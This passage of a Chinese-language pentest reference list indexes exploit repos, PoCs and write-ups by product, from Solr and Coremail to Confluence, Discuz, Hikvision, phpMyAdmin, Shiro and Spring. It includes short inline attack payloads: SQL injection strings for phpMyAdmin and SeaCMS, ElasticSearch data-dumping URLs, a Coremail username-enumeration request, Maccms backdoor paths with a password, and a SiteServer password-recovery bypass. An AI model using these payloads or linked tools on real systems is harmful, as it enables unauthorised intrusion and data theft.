[CVE-2020-13957:Apache Solr 未授权上传漏洞复现](https://mp.weixin.qq.com/s/1I-EwYWMnlsLsVf67F3G1w)
[Solr任意文件读取漏洞环境搭建和复现](https://mp.weixin.qq.com/s/1AYen3qZMhiiym_wJh5lzw)
[Apache Solr<= 8.8.2 (最新) 任意文件删除](https://mp.weixin.qq.com/s/dECH74n5qjrWT9lok8IkPQ)
[Henry4E36/Solr-SSRF](https://github.com/Henry4E36/Solr-SSRF)
## Apache SuperSet
[CVE-2023-27524 的基本 PoC:Apache Superset 中的不安全默认配置](https://github.com/horizon3ai/CVE-2023-27524)
## Big-IP
[BIG-IP iCONTROL REST AUTH BYPASS RCE POC CVE-2022-1388](https://github.com/TomArni680/CVE-2022-1388-POC)
## Coremail
版本信息
```
/coremail/s/json?func=verify
```
爆破用户名
```
/coremail/s?func=user:getLocaleUserName
{
"email":"zhangsan"
"defaultURL":"1"
}
```
[导出coremail通讯录](https://github.com/newcodor/coremail_address_list_export)
[Coremail漏洞](https://github.com/HackJava/HackCoremail)
[Coremail邮件系统组织通讯录一键导出](https://github.com/dpu/coremail-address-book)
[Coremail nday 任意密码修改复现](https://mp.weixin.qq.com/s/YZwMvWiqVNh5Locf-eBCVw)
[yuxiaoyou123/coremail-exp](https://github.com/yuxiaoyou123/coremail-exp)
[coremail漏洞之我见(碎碎念)](https://mp.weixin.qq.com/s/q6VUmRxBPLKT35qPHr4gSw)
[jimoyong/CoreMailUploadRce](https://github.com/jimoyong/CoreMailUploadRce)
## Confluence
[Confluence未授权添加管理员用户(CVE-2023-22515)漏洞利用工具](https://github.com/ad-calcium/CVE-2023-22515)
[CVE-2022-26134 概念证明](https://github.com/jbaines-r7/through_the_wire)
[CVE-2022-26134-Godzilla-MEMSHELL](https://github.com/BeichenDream/CVE-2022-26134-Godzilla-MEMSHELL)
[Confluence 文件读取漏洞(CVE-2019-3394)分析](https://paper.seebug.org/1025/)
[Confluence 未授权 RCE (CVE-2019-3396) 漏洞分析](https://paper.seebug.org/884/)
[Yt1g3r/CVE-2019-3396_EXP](https://github.com/Yt1g3r/CVE-2019-3396_EXP)
[CVE-2021-26084-Confluence命令执行 全版本内存马注入](https://mp.weixin.qq.com/s/wbIvFQmkdJH6g6ZKBFXyYQ)
[alt3kx/CVE-2021-26084_PoC](https://github.com/alt3kx/CVE-2021-26084_PoC)
## DedeCMS
[织梦全版本漏洞扫描工具](https://github.com/lengjibo/dedecmscan)
[解决DEDECMS历史难题--找后台目录](https://xz.aliyun.com/t/2064)
[Dedecms 最新版漏洞收集并复现学习](https://blog.szfszf.top/article/25/)
[Chasing a Dream :: Pre-authenticated Remote Code Execution in Dedecms](https://srcincite.io/blog/2021/09/30/chasing-a-dream-pwning-the-biggest-cms-in-china.html)
[DedeCMS 未授权RCE漏洞原理及影响面分析](https://mp.weixin.qq.com/s/KZ7O0JRLvk4_O1GvL5lMVw)
[Dedecms GetCookie Type Juggling Authentication Bypass Vulnerability](https://srcincite.io/pocs/src-2021-0029.py.txt)
## Django
[CVE-2020-7471 Django StringAgg SQL Injection漏洞复现](https://mp.weixin.qq.com/s/j4OL927w3JtL1k2hFvmffw)
## Discuz
[Discuz漏洞整理.pdf](https://github.com/Awrrays/Pentest-Tips/blob/main/Discuz%E6%BC%8F%E6%B4%9E%E6%95%B4%E7%90%86.pdf)
[Discuz!X 前台任意文件删除漏洞深入解析](https://xz.aliyun.com/t/34)
[Discuz!因Memcached未授权访问导致的RCE](https://xz.aliyun.com/t/2018)
[Discuz!X 个人账户删除漏洞](https://xz.aliyun.com/t/2297)
[Discuz!x3.4后台文件任意删除漏洞分析](https://xz.aliyun.com/t/4725)
[DiscuzX v3.4 排行页面存储型XSS漏洞 分析](https://xz.aliyun.com/t/2899)
[WooYun-2015-137991 Discuz利用UC_KEY进行前台getshell2](https://php.mengsec.com/bugs/wooyun-2015-0137991.html)
[Discuz! 1.5-2.5 命令执行漏洞分析(CVE-2018-14729)](https://paper.seebug.org/763/)
[FoolMitAh/CVE-2018-14729](https://github.com/FoolMitAh/CVE-2018-14729)
[实例分析 DiscuzX 3.4 SSRF漏洞](https://mp.weixin.qq.com/s/TRCdXZU8v1NsbFhZKLa1Qw)
[Discuz x3.4前台SSRF](https://www.codercto.com/a/43029.html)
[theLSA/discuz-ml-rce](https://github.com/theLSA/discuz-ml-rce)
[Discuz! ML远程代码执行(CVE-2019-13956)](https://www.cnblogs.com/yuzly/p/11386755.html)
[Discuz!ML V3.X 代码注入分析](https://xz.aliyun.com/t/5638)
## Drupal
[CVE-2017-6920:Drupal远程代码执行漏洞分析及POC构造](https://paper.seebug.org/334/)
[Drupal Core 8 PECL YAML 反序列化任意代码执行漏洞 (CVE-2017-6920)](https://vulhub.org/#/environments/drupal/CVE-2017-6920/)
https://github.com/vulhub/vulhub/blob/master/drupal/CVE-2018-7600/README.zh-cn.md
[pimps/CVE-2018-7600](https://github.com/pimps/CVE-2018-7600)
[dreadlocked/Drupalgeddon2](https://github.com/dreadlocked/Drupalgeddon2)
[Drupal 远程代码执行漏洞(CVE-2018-7602)](https://vulhub.org/#/environments/drupal/CVE-2018-7602/)
[CVE-2018-7600/drupa7-CVE-2018-7602.py](https://github.com/pimps/CVE-2018-7600/blob/master/drupa7-CVE-2018-7602.py)
[Drupal 1-click to RCE 分析](https://paper.seebug.org/897/)
https://vulhub.org/#/environments/drupal/CVE-2019-6339/
[Drupal(CVE-2020-28948/CVE-2020-28949)分析](https://mp.weixin.qq.com/s/-5z2gCrstyCLOOzgf1tZTg)
## ECshop
[ECShop 2.x/3.x SQL注入/任意代码执行漏洞](https://github.com/vulhub/vulhub/blob/master/ecshop/xianzhi-2017-02-82239600/README.zh-cn.md)
[ecshop2.x 代码执行](https://paper.seebug.org/691/)
[ecshop后台getshell](http://www.zstreamer.cn/2020/09/09/ecshop2.7_3.6后台getshell/)
## ElasticSearch
- `http://[ip]:9200`
- `http://[ip]:9200/_plugin/head/` web 管理界面
- `http://[ip]:9200/hello/_search?pretty&size=50&from=50`
- `http://[ip]:9200/_cat/indices`
- `http://[ip]:9200/_river/_search` 查看数据库敏感信息
- `http://[ip]:9200/_nodes` 查看节点数据
- `http://[ip]:9200/_cat/indices?v` 查看当前节点的所有 Index
- `http://[ip]:9200/_search?pretty=true` 查询所有的 index, type
- [Elasticvue](https://chrome.google.com/webstore/detail/elasticvue/hkedbapjpblbodpgbajblpnlpenaebaa?hl=en-US) - 进行未授权访问漏洞利用的插件
[ElasticSearch 命令执行漏洞 (CVE-2014-3120) 测试环境](https://vulhub.org/#/environments/elasticsearch/CVE-2014-3120/)
[Remote Code Execution in Elasticsearch - CVE-2015-1427](https://jordan-wright.com/blog/2015/03/08/elasticsearch-rce-vulnerability-cve-2015-1427/)
[ElasticSearch Groovy 沙盒绕过 && 代码执行漏洞 (CVE-2015-1427) 测试环境](https://vulhub.org/#/environments/elasticsearch/CVE-2015-1427/)
https://vulhub.org/#/environments/elasticsearch/CVE-2015-3337/
[Elasticsearch目录遍历漏洞 (CVE-2015-5531) 复现与分析 (附PoC)](https://www.freebuf.com/vuls/99942.html)
https://blog.csdn.net/u013613428/article/details/121884479
## Exchange
[xchange邮件服务器的账户爆破](https://github.com/grayddq/EBurst)
[利用NTLM Hash读取Exchange邮件](https://github.com/Ridter/GetMail)
[Exchange渗透测试总结](https://www.anquanke.com/post/id/184342)
## ewebeditor
[ewebeditor 编辑器漏洞总结](https://www.0dayhack.com/post-426.html)
## Fastadmin
[fastadmin最新版前台getshell漏洞](https://mp.weixin.qq.com/s/XR6p6sf3__QtpMjJuJEjfA)
[fastadmin文件管理插件](https://github.com/WenchaoLin/Filex)
## FastJson
[基于dbcp的fastjson rce 回显](https://github.com/depycode/fastjson-local-echo)
[Fastjson-Gadgets-自动扫描仪](https://github.com/H3rmesk1t/Fastjson-Gadgets-Automatic-Scanner)
[Fastjson姿势技巧集合](https://github.com/safe6Sec/Fastjson)
[fastjson bypass autotype 1.2.68 with Throwable and AutoCloseable.](https://github.com/Y4er/fastjson-bypass-autotype-1.2.68)
## Fckeditor
[fck2.4.3文件上传通杀脚本](https://github.com/chaosec2021/FCKeditor-2.4.3--exp)
[Fckeditor上传漏洞利用拿shell总结](https://www.0dayhack.com/post-413.html)
## Flask
[Flask 内存马](https://github.com/iceyhexman/flask_memory_shell)
## GeoServer
[CVE-2023-25157 - GeoServer SQL 注入 - PoC](https://github.com/win3zz/CVE-2023-25157/)
## Gitlab
[gitlab-version-nse](https://github.com/righel/gitlab-version-nse)
[通过the bulk imports UploadsPipeline任意文件读取](https://gitlab.com/gitlab-org/gitlab/-/issues/349524)
[CVE-2021-22205](https://github.com/inspiringz/CVE-2021-22205)
[CVE-2021-22205](https://github.com/Al1ex/CVE-2021-22205)
[GitLab任意文件读取漏洞复现](https://mp.weixin.qq.com/s/HKZHUs_bTN-00_8HsU6grA)
[Arbitrary file read via the UploadsRewriter when moving and issue](https://hackerone.com/reports/827052)
[CsEnox/CVE-2022-2992](https://github.com/CsEnox/CVE-2022-2992)
## Gitea
[Gitea 存储库迁移远程命令执行漏洞。](https://github.com/wuhan005/CVE-2022-30781)
[Go代码审计 - gitea 远程命令执行漏洞链](https://www.leavesongs.com/PENETRATION/gitea-remote-command-execution.html)
https://github.com/vulhub/vulhub/tree/master/gitea/1.4-rce
## Harbor
https://github.com/goharbor/harbor/security/advisories/GHSA-6qj9-33j4-rvhg
https://unit42.paloaltonetworks.com/critical-vulnerability-in-harbor-enables-privilege-escalation-from-zero-to-admin-cve-2019-16097/
https://www.youtube.com/watch?v=v8Isqy4yR3Q
## Hikvision
[Hikvision 流媒体管理服务器敏感信息泄漏](https://github.com/Henry4E36/HikvisionInformation)
[海康威视 CVE-2021-36260 RCE 漏洞](https://github.com/Cuerz/CVE-2021-36260)
[海康威视综合安防平台后渗透利用工具](https://github.com/wafinfo/Hikvision)
[HIKVISION iVMS-8700综合安防管理平台 upload.action 任意文件上传](https://peiqi.wgpsec.org/wiki/iot/HIKVISION/HIKVISION%20iVMS-8700%E7%BB%BC%E5%90%88%E5%AE%89%E9%98%B2%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%20upload.action%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0.html)
[HIKVISION 综合安防管理平台 applyCT Fastjson远程命令执行漏洞](https://peiqi.wgpsec.org/wiki/iot/HIKVISION/HIKVISION%20%E7%BB%BC%E5%90%88%E5%AE%89%E9%98%B2%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%20applyCT%20Fastjson%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html)
[HiKVISION 综合安防管理平台 files 任意文件上传漏洞](https://peiqi.wgpsec.org/wiki/iot/HIKVISION/HiKVISION%20%E7%BB%BC%E5%90%88%E5%AE%89%E9%98%B2%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%20files%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html)
[HiKVISION 综合安防管理平台 report 任意文件上传漏洞](https://peiqi.wgpsec.org/wiki/iot/HIKVISION/HiKVISION%20%E7%BB%BC%E5%90%88%E5%AE%89%E9%98%B2%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%20report%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html)
[HiKVISION 综合安防管理平台 env 信息泄漏漏洞](https://peiqi.wgpsec.org/wiki/iot/HIKVISION/HiKVISION%20%E7%BB%BC%E5%90%88%E5%AE%89%E9%98%B2%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%20env%20%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.html)
[综合安防管理平台 _svm_api_v1_productFile 远程命令执行](https://mp.weixin.qq.com/s?__biz=MzIyMjkzMzY4Ng==&mid=2247505219&idx=1&sn=f48d189da00e2f7040a3b62de580d8c1)
## 海康威视IP网络对讲广播系统
[【漏洞复现】海康威视IP网络对讲广播系统存在命令注入漏洞](https://mp.weixin.qq.com/s?__biz=MzU5MTc1NTE0Ng==&mid=2247485360&idx=1&sn=aea143927b6bd96689f5d435bfb8df6c)
## IIS
[多线程批量检测IIS短文件名漏洞+漏洞利用](https://github.com/VMsec/iisScaner)
[CVE-2017-7269 IIS6.0远程代码执行漏洞分析及Exploit](https://paper.seebug.org/259/)
[lcatro/CVE-2017-7269-Echo-PoC](https://github.com/lcatro/CVE-2017-7269-Echo-PoC)
[edwardz246003/IIS_exploit](https://github.com/edwardz246003/IIS_exploit)
## I Doc View 在线文档预览系统
[【漏洞复现】I Doc View 在线文档预览系统远程代码执行漏洞](https://mp.weixin.qq.com/s?__biz=MzkxNTU5NjM5MQ==&mid=2247484409&idx=1&sn=ec6b363cbab59af3e323b3c18425b017&chksm=c15df6f1f62a7fe7ef6538e339eb29b59aa313a9e4c85f06482104f535ccc22fdcf83bbd2ef5&scene=126&sessionid=1701682077&key=1afad7311c1000c6326803e9993c3c3655685ec951d2506e5c3879b5677aaf2e6458039c2819a39d8ae10924fb7bc3801ac1eef39a661e9fa79211b8ba2fdfa2c640b23a6b917d9e431bc0f625f47fe16e7dcaa1d68152df42bed5848fd2efb0eda64c3b2a6765a3feb931a321c5edb2911a15b1e201ed23c21536122e4cb91f&ascene=15&uin=MzgxODQ4MjMz&devicetype=Windows+10+x64&version=63060012&lang=zh_CN&session_us=gh_c63b035bdde2&countrycode=GY&exportkey=n_ChQIAhIQ7Q315IOTslTK%2FxQwXGrc8RLmAQIE97dBBAEAAAAAAGIzN77M9Z8AAAAOpnltbLcz9gKNyK89dVj0u9EpNejbnNVOqEwJ4P6GYsvS0ML6oYIp1QqiHaFhhv%2FiWbMiN5JeGmU4kXOZzLVgs5F5lGq6Ld7BddxZK1XubANs13KMx3EV6BxC9PkDAobbJnFHhnB08kTxP%2F6r1jkRhFNUiEgGZoc%2BZWIVIyNXOX2NlJKwXjUMkuMi8PiN%2BPqU3zpfOqydlt%2F1IQlxoESqgm72uT8gP05hHQHf0UQmGlmiJcvcu7HumCvC0MA%2FpSugSDM7ch1bWlFQNDC1cwee&acctmode=0&pass_ticket=A4qxtGK0O4LeaDLKYYXNijQqeFho03G%2B90v3l9RyysEVcEcvjTMQ8cVu%2FWiZLpAuvaj7W%2BgV1ofOSy%2FnY1C2Gg%3D%3D&wx_header=0&fontgear=2)
## IP-Guard
[【漏洞复现】IP-guard WebServer 远程命令执行漏洞](https://mp.weixin.qq.com/s?__biz=MzI3NzMzNzE5Ng==&mid=2247486971&idx=1&sn=11a6cbd4db9a45976beb39fe613a3010)
## Jboss
[JBOSS和其他 Java 反序列化漏洞验证和利用工具](https://github.com/joaomatosf/jexboss)
[jboss常见漏洞复现](https://www.xpshuai.cn/posts/60637/)
[Jboss漏洞总结](http://www.zstreamer.cn/2020/07/09/Jboss漏洞总结/)
[Red Hat JBoss EAP - Deserialization of Untrusted Data](https://www.exploit-db.com/exploits/40842)
[JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)](https://github.com/vulhub/vulhub/blob/master/jboss/CVE-2017-7504/README.md)
[yunxu1/jboss-_CVE-2017-12149](https://github.com/yunxu1/jboss-_CVE-2017-12149)
[jreppiks/CVE-2017-12149](https://github.com/jreppiks/CVE-2017-12149)
https://github.com/vulhub/vulhub/tree/master/jboss/CVE-2017-12149
[JBoss JMXInvokerServlet 反序列化漏洞](https://github.com/vulhub/vulhub/blob/master/jboss/JMXInvokerServlet-deserialization/README.md)
## JeecgBoot
[jmreport/qurestSql 未授权SQL注入批量扫描poc](https://github.com/MzzdToT/CVE-2023-1454)
## Jetty
https://github.com/vulhub/vulhub/blob/master/jetty/CVE-2021-28169/README.zh-cn.md
https://github.com/vulhub/vulhub/blob/master/jetty/CVE-2021-28164/README.zh-cn.md
## Jenkins
[awesome-jenkins-rce](https://github.com/orangetw/awesome-jenkins-rce-2019)
[Hacking Jenkins Part 1 - Play with Dynamic Routing](https://devco.re/blog/2019/01/16/hacking-Jenkins-part1-play-with-dynamic-routing/)
[Hacking Jenkins Part 2 - Abusing Meta Programming for Unauthenticated RCE!](https://devco.re/blog/2019/02/19/hacking-Jenkins-part2-abusing-meta-programming-for-unauthenticated-RCE/)
[Jenkins RCE漏洞分析汇总](http://www.lmxspace.com/2019/09/15/Jenkins-RCE漏洞分析汇总/)
[安全研究 | Jenkins漏洞分析](https://www.freebuf.com/news/242764.html)
[Jenkins漏洞探测、用户抓取爆破](https://github.com/blackye/Jenkins)
[Jenkins任意文件读取漏洞(CVE-2018-1999002)复现记录](https://mp.weixin.qq.com/s/MOKeN1qEBonS8bOLw6LH_w)
[Jenkins未授权访问RCE漏洞复现记录 | angelwhu_blog](https://www.angelwhu.com/blog/?p=539)
[jas502n/CVE-2019-10392](https://github.com/jas502n/CVE-2019-10392)
## Joomla
[CVE-2017-8917 - SQL injection Vulnerability Exploit in Joomla 3.7.0](https://github.com/stefanlucas/Exploit-Joomla)
[Joomla! 3.7 Core SQL 注入 (CVE-2017-8917)漏洞分析](https://paper.seebug.org/305/)
[HoangKien1020/CVE-2021-23132](https://github.com/HoangKien1020/CVE-2021-23132)
## JumpServer
[JumpServer远程执行漏洞 复现](https://www.o2oxy.cn/2921.html)
[JumpServer远程命令执行你可能不知道的点(附利用工具)](https://mp.weixin.qq.com/s/lbcYzNsiOYZRwQzAIYxg3g)
[Skactor/jumpserver_rce](https://github.com/Skactor/jumpserver_rce)
[Veraxy00/Jumpserver-EXP](https://github.com/Veraxy00/Jumpserver-EXP)
[Jumpserver安全一窥:Sep系列漏洞深度解析](https://mp.weixin.qq.com/s/3iAn_aUNg8k5qW34Yb21Bw)
[JumpServer 密码重置漏洞](https://github.com/C1ph3rX13/CVE-2023-42820)
[JumpServer 任意文件写入漏洞 CVE-2023-42819 + CVE-2023-42820 = GetShell](https://github.com/C1ph3rX13/CVE-2023-42819)
## Kindeditor
[kindeditor<=4.1.5上传漏洞复现](https://www.cnblogs.com/backlion/p/10421405.html)
[大批量Kindeditor文件上传事件的漏洞分析](https://www.freebuf.com/column/202148.html)
## Laravel
[Laravel 6.x/7.x的一条执行代码的反序列化利用链](https://www.o2oxy.cn/3588.html)
[LARAVEL <= V8.4.2 DEBUG MODE: REMOTE CODE EXECUTION](https://www.ambionics.io/blog/laravel-debug-rce)
[漏洞分析 | Laravel Debug页面RCE(CVE-2021-3129)分析复现](https://mp.weixin.qq.com/s/k08P2Uij_4ds35FxE2eh0g)
[再谈Laravel Debug mode RCE(CVE-2021-3129)漏洞](https://www.freebuf.com/vuls/264662.html)
[ambionics/laravel-exploits](https://github.com/ambionics/laravel-exploits)
[Laravel 8.x image upload bypass](https://infosecwriteups.com/laravel-8-x-image-upload-bypass-zero-day-852bd806019b)
## Log4j
[log4j solr rce](https://twitter.com/pyn3rd/status/1470359076617932800)
[受log4j影响的软件](https://github.com/NCSC-NL/log4shell/tree/main/software)
[️ 🤬CVE-2021-44228 - LOG4J Java 漏洞利用 - WAF 绕过技巧](https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words)
[Log4j漏洞至今仍被持续利用](https://www.horizon3.ai/the-long-tail-of-log4shell-exploitation/)
[Log4j-Payloads](https://github.com/queencitycyber/Log4j-Payloads)
## Maccms
```
maccms10\extend\upyun\src\Upyun\Api\Format.php
maccms10\extend\Qcloud\Sms\Sms.php
密码 WorldFilledWithLove
```
[Maccms v10后门](http://www.360doc.com/content/20/0203/14/30583588_889434397.shtml)
## Milesight
[Milesight VPN server.js 任意文件读取漏洞](https://peiqi.wgpsec.org/wiki/iot/Milesight/Milesight%20VPN%20server.js%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html)
## MinIO
[容器与云的碰撞——一次对MinIO的测试](https://cloud.tencent.com/developer/article/1785462)
[(CVE-2023-28432) | MinIO verify 接口敏感信息泄露漏洞](https://mp.weixin.qq.com/s?__biz=MzkyMjE3MjEyNQ==&mid=2247486024&idx=1&sn=505829c79bc3bdc2b6598cdaf104666b&chksm=c1f925faf68eacec10fbc833c87f8f95578ebe0cd86b9d54690d471fd1d10eb44bf145d6be6a)
https://github.com/minio/console/security/advisories/GHSA-4999-659w-mq36
## MessageSolution
[CNVD-2021-10543:MessageSolution 企业邮件归档管理系统 EEA 存在信息泄露漏洞](https://github.com/Henry4E36/CNVD-2021-10543)
## MetInfo
[MetInfo5.3.19安装过程过滤不严导致Getshell](https://bbs.ichunqiu.com/thread-35305-1-17.html)
[MetInfo6.0.0漏洞集合(一)](https://bbs.ichunqiu.com/thread-43416-1-7.html)
[MetInfo6.1.0 漏洞(二)](https://bbs.ichunqiu.com/thread-43625-1-4.html)
[Metinfo 6.1.2 SQL注入](https://bbs.ichunqiu.com/thread-46687-1-1.html)
[metinfo最新版本后台getshell](https://bbs.ichunqiu.com/thread-29686-1-2.html)
[Metinfo7的一些鸡肋漏洞](https://evi1.cn/post/metinfo7-bug/)
[Metinfo7.0 SQL Blind Injection](https://github.com/T3qui1a/metinfo_sqlinjection/issues/1)
[CVE-2018-13024复现及一次简单的内网渗透](https://www.freebuf.com/news/193748.html)
## Metabase
[Metabase validate 远程命令执行漏洞 CVE-2023-38646](https://peiqi.wgpsec.org/wiki/webapp/Metabase/Metabase%20validate%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%20CVE-2023-38646.html)
## MeterSphere
[任意文件上传](https://github.com/metersphere/metersphere/issues/8653)
## Nacos
大部分企业的 nacos 的 url 为 /v1/auth/users ,而不是 /nacos/v1/auth/users
[Alibaba Nacos 未授权访问漏洞](https://blog.csdn.net/m0_46257936/article/details/113127814)
https://raw.githubusercontent.com/dwisiswant0/nuclei-templates/add/GHSL-2020-325/cves/2021/CVE-2021-29441.yaml
[Nacos Client Yaml反序列化漏洞分析](https://xz.aliyun.com/t/10355)
[Nacos密码碰撞](https://www.jisuan.mobi/nX7.html)
[Nacos Hessian 反序列化漏洞利用工具](https://github.com/c0olw/NacosRce)
## NETGEAR ProSafe SSL VPN
[NETGEAR ProSafe SSL VPN SQL 注入漏洞](https://github.com/badboycxcc/Netgear-ssl-vpn-20211222-CVE-2022-29383)
## Nexus
[Nexus Repository Manager 3 远程命令执行漏洞 (CVE-2019-7238)](https://vulhub.org/#/environments/nexus/CVE-2019-7238/)
[mpgn/CVE-2019-7238](https://github.com/mpgn/CVE-2019-7238)
[jas502n/CVE-2019-7238](https://github.com/jas502n/CVE-2019-7238)
[Nexus Repository Manager(CVE-2020-10199/10204)漏洞分析及回显利用方法的简单讨论](https://www.cnblogs.com/magic-zero/p/12641068.html)
[aleenzz/CVE-2020-10199](https://github.com/aleenzz/CVE-2020-10199)
[CVE-2020-29436:Nexus3 XML外部实体注入复现](https://mp.weixin.qq.com/s/u6LWHvNEieQsV-ny6xwMmQ)
## NPS
[carr0t2/nps-auth-bypass](https://github.com/carr0t2/nps-auth-bypass)
## Openfire
[后台插件getshell](https://github.com/22CB7139/openfire_shells)
[openfire AES和Blowfish加解密工具](https://github.com/ca3tie1/OpenFireEncryptor)
[『漏洞复现』记 Openfire 身份认证绕过漏洞导致 RCE](https://mp.weixin.qq.com/s?__biz=Mzg4NTA0MzgxNQ==&mid=2247488691&idx=1&sn=60271069ce409bb3d3198df6a265b44b)
## Oracle Access Manager
[CVE-2021-35587 Oracle Access Manager 未经身份验证的攻击者漏洞 ](https://github.com/antx-code/CVE-2021-35587/blob/main/CVE-2021-35587.py)
## Outlook
[ 一个玩 Outlook 的小工具](https://github.com/eksperience/KnockOutlook)
## Panalog 日志审计系统
[panalog日志审计系统任意用户创建漏洞和后台命令执行](https://mp.weixin.qq.com/s/98kn5ry-C-IeKY2MDebjLw)
## PHPMailer
[PHPMailer 任意文件读取漏洞](https://mp.weixin.qq.com/s/y7N3CD1683W2WX-naT5HCA)
## phpMyAdmin
[phpMyAdmin新姿势getshell](https://zhuanlan.zhihu.com/p/25957366)
[phpMyAdmin 4.6.2 - (Authenticated) Remote Code Execution](https://www.exploit-db.com/exploits/40185)
[phpMyAdmin 4.7.x CSRF 漏洞利用](https://blog.vulnspy.com/2018/06/10/phpMyAdmin-4-7-x-XSRF-CSRF-vulnerability-exploit/)
[phpmyadmin4.8.1后台getshell](https://mp.weixin.qq.com/s/HZcS2HdUtqz10jUEN57aog)
[CVE-2018-12613漏洞学习总结](https://mp.weixin.qq.com/s/zGJxjtDLkw9CMHGfNRu1nw)
[phpMyAdmin任意文件读取漏洞复现(CVE-2019-6799)以及检测POC编写](https://bbs.zkaq.cn/t/4570.html)
[CVE-2019-12922 4.9.0.1 CSRF](https://www.hedysx.com/bug/2398.html)
CVE-2020-26935 phpmyadmin后台SQL注入
```mysql
/tbl_zoom_select.php?db=pentest&table=a&get_data_row=1&where_clause=updatexml(1,concat(0x7e,user()),1)
```
[phpMyAdmin 5.1.1 - XSS](https://mp.weixin.qq.com/s/c2kwxwVUn1ym7oqv9Uio_A)
## PHPMyWind
[记一次渗透测试历程](https://xz.aliyun.com/t/6018)
[phpmywind最新版sql注入以及后台目录遍历和文件读取](https://blog.csdn.net/dengzhasong7076/article/details/102139691)
[PHPMyWind v5.5 审计记录](https://bbs.ichunqiu.com/thread-46703-1-1.html)
https://www.exploit-db.com/exploits/42535
## PigCMS
[PigCMS action_flashUpload 任意文件上传漏洞](https://peiqi.wgpsec.org/wiki/cms/PigCMS/PigCMS%20action_flashUpload%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html)
## Resin
[针对Resin服务的攻击向量整理](https://blkstone.github.io/2017/10/30/resin-attack-vectors/)
[Resin任意文件读取漏洞](https://www.cnblogs.com/KevinGeorge/p/8953731.html)
[Resin容器文件解析漏洞深入分析](https://mp.weixin.qq.com/s/eZAG3Ze0ytd5l7ci1nb-qg)
## SeaCMS
app="海洋CMS"
攻击者可通过对admin_members_group.php的编辑操作中的id参数利用该漏洞进行SQL注入攻击。
```
/admin_members_group.php?action=edit&id=2%20and%20if(mid(user(),1,1)=%27r%27,concat(rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27))%20RLIKE%20%27(a.*)%2b(a.*)%2b(a.*)%2b(a.*)%2b(a.*)%2b(a.*)%2b(a.*)%2bcd%27,1)
```
## Shiro
[基于SerializationDumper的Shiro Cookie序列化数据解密小工具](https://github.com/r00tuser111/SerializationDumper-Shiro)
[改造BeichenDream/InjectJDBC加入shiro获取key和修改key功能](https://github.com/SummerSec/AgentInjectTool)
[shiro-550-with-NoCC](https://github.com/dr0op/shiro-550-with-NoCC)
[j1anFen/shiro_attack](https://github.com/j1anFen/shiro_attack)
[ShiroExploit-Deprecated](https://github.com/feihong-cs/ShiroExploit-Deprecated)
[Echox1/ShiroExploit](https://github.com/Echox1/ShiroExploit)
[Ares-X/shiro-exploit](https://github.com/Ares-X/shiro-exploit)
[shiro 反序列 命令执行辅助检测工具](https://github.com/wyzxxz/shiro_rce_tool)
[burp插件 ShiroScan 主要用于框架、无dnslog key检测](https://github.com/Daybr4ak/ShiroScan)
## ShopXO
[ShopXO download 任意文件读取漏洞 CNVD-2021-15822](https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog)
## ShowDoc
[ShowDoc 前台任意文件上传](http://47.115.146.38/2021/04/27/showdoc/)
## SiteServer
**找回密码**
管理员的 “密码找回问题答案” 为非强制项,一般都留空。此时如果在密码找回页面,输入空密码找回答案,就可以获得当前管理员的密码明文(页面有做 javascript 限制答案长度不能为 0,但禁用 javascript 即可绕过)
访问 /siteserver/forgetPassword.aspx, 然后禁止 Javascript。输入用户名,获取密码
[代码审计 | SiteServerCMS身份认证机制](https://www.freebuf.com/vuls/228448.html)
[代码审计 | SiteServerCMS密钥攻击](https://www.freebuf.com/vuls/234549.html)
[某Server CMS最新6.8.3版本验证码绕过&后台多处注入](https://xz.aliyun.com/t/4119)
[简记野生应急捕获到的siteserver远程模板下载Getshell漏洞](https://www.freebuf.com/articles/web/195105.html)
[zhaoweiho/SiteServer-CMS-Remote-download-Getshell](https://github.com/zhaoweiho/SiteServer-CMS-Remote-download-Getshell)
## Sophos Firewall
[CVE-2022-1040](https://github.com/killvxk/CVE-2022-1040)
## Spring
[CVE-2022-22947 Spring Cloud Gateway 远程代码执行漏洞复现](https://mp.weixin.qq.com/s/5ZBpVTofGpG_ssz2iPeI2A)
[Spring-cloud-function SpEL RCE, Vultarget & Poc](https://github.com/cckuailong/spring-cloud-function-SpEL-RCE)
[SpringBootVulExploit](https://github.com/LandGrey/SpringBootVulExploit)
[一款针对SpringBootEnv页面进行快速漏洞利用](https://github.com/0x727/SpringBootExploit)
[Spring漏洞利用](https://github.com/Crush-sudo/pocsuite/tree/master/Spring)
[Spring boot Fat Jar 任意写文件漏洞到稳定 RCE 利用技巧](https://github.com/LandGrey/spring-boot-upload-file-lead-to-rce-tricks)
